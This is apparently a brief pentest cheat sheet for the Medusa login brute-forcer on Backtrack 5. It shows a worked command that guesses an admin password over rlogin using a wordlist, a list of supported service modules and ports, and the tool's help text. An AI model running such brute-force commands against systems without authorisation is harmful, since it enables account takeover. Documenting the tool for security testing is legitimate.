control – medusa passwords

Backtrack 5 r1

medusa -h (IP Address) -u (Username) -P (Location of password file) -M telnet -t1 -f -e ns

root@bt:~# medusa -h 192.168.0.1 -u admin  -P /pentest/passwords/wordlists/darkc0de.lst -M rlogin -t1 -f -e ns

modules you can scan instead of telnet

ftp – 21
http – 80
imap – 143
mssql – 1433
mysql – 3306
ncp – 524
nntp – 119
pcanywhere – 5631
pop3 – 110
postgres – 5432
rexec – 512
rlogin – 513
rsh – 514
smbnt
smtp – 25
smtp-vrfy
snmp – 161
ssh – 22
svn – 3690
telnet – 23
vmauthd
vnc – 5900
web-form
wrapper

modules location
/usr/local/lib/medusa/modules/

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: User logon information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display module’s usage information
-v [NUM]     : Verbose level [0 – 6 (more)]
-w [NUM]     : Error debug level [0 – 10 (more)]
-V           : Display version
-Z [TEXT]    : Resume scan based on map of previous scan

Leave a comment